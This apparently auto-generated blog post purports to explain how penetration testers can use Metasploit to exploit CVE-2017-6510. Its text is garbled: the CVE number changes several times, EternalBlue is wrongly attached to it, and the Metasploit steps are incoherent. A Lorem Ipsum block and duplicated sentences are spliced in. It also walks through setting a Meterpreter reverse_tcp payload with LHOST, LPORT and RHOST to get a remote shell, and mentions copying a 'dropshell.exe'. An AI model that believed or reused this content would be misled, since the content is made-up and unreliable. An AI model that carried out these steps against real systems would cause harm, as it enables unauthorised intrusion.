If you are a penetration tester, you may be wondering what the metasploit module name is that can be used to exploit the CVE-2017-6510 vulnerability. In this blog post, we will discuss how to use Metasploit to exploit and take advantage of this vulnerability.
We will also identify what is the metasploit module name that can be used to exploit the cve-2017-6510 vulnerability?
This blog post will cover:
what is the metasploit module name that can be used to exploit the cve-2017-6520 vulnerability?
how to use Metasploit to exploit and take advantage of this vulnerability.
what are some considerations for penetration testers when exploiting CVE 2017 6511 (cve_2017_655a) vulnerability?
How to use Metasploit to exploit and take advantage of this vulnerability:
Most Windows systems are vulnerable. The metasploit module name that can be used to exploit the cve-2017-6520 vulnerability is EternalBlue_DoublePulsar . You can find it in the cyber arsenal, which you download from here (metasploit) or follow this link [here]. Once downloaded, extract them into a directory on your local hard drive. This will create two directories called msfconsole and payloads. Copy any exploits you want to try out from these folders onto your system’s C:\ drive – if they’re not already there. For instance, let’s say we wanted copy an exploitable executable called “dropshell.exe” to the C:\ drive. If we were at our C:\ prompt, we would type:
copy c:\exploits\dropshell.exe c:\
Once you have copied all the exploit binaries over to your system’s hard drive, start up msfconsole by typing in cmd or command depending on your version of Windows and then type “start”. This will bring up a metasploit console window where you can enter commands for Metasploit modules (a command line interface). To access exploits in this window, use the search bar which is located above it . Type EternalBlue_DoublePulsar into that field and hit return as seen below:
Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with its inclusion in Adobe Systems’ PageMaker software. – if they’re not already there . For instance , let’s say we wanted copy an exploitable executable called “dropshell.exe” to the C:\ drive . If we were at our C:\ prompt , we would type: -copy c:\dropshell.exe c:\
– – and hit enter . This will copy the file from our current directory to the C:\ root of our hard drive , overwriting any previous executable called “dropshell.exe” if it was there already .
Next, we’ll need to use the Metasploit console as an authenticated user . We can do so by typing: -msfconsole
And then entering our username and password. Once entered, we will see a prompt for “Meterpreter” where it lists all of the available hosts on which we could interact with.
We want to connect back to our attacker’s machine from this host , but first make sure that you are in Meterpreter session one by typing ‘sessions’ at the msfconsole command line and pressing enter. Type sessions again and press enter when done .
Now type exploit (space) cve_2017__6511 (space) payload/windows/meterpreter/reverse_tcp (space) LHOST=172.16.0.100
And then hit enter and wait for a shell to come back .
We want the computer that we are attacking, so type “set LPORT 443” followed by hitting tab key twice if you want a port other than default value of 80; otherwise just press enter after typing exploit followed by cve_2017__6511 and payload/windows/meterpreter/reverse_tcp going on in sequence with no spaces between each one. We will also need to set our IP address for listening which is 172.16.0.100, it should be noted here that this can vary from person to person but make sure the IP address is a valid one that exists.
To make sure we’re on point, type “set LPORT 443” and press enter .
Type “show options” to see what payloads are available for use with our exploit module before proceeding further. One of these will be called windows/meterpreter/reverse_tcp which denotes this as an executable program running locally and listening over port 443; therefore it should not return any data back when executed (such as in netstat). Note: once you select your desired payload here, then all other modules have been automatically selected for us so there’s no need to worry about going through each individual option again just to pick out what we want. When ready, type “set LHOST 192.168.0.101” and press enter .
To make sure the IP address is set properly, type “show options” to make sure that the LHOST and LPORT IP addresses are what you want.
Type “set RHOST 192.168.0.101” (replace with target address) and press enter .
You can also manually specify a range of hosts such as: 192.168.0.* or even just use one host by typing in an asterisk (*). It’s up to your preference! Note: this command should be on its own line without any spaces; if it doesn’t work then there may have been a typo so try correcting it before continuing since we don’t know what the error means otherwise! When ready, type “exploit -j” and press enter.
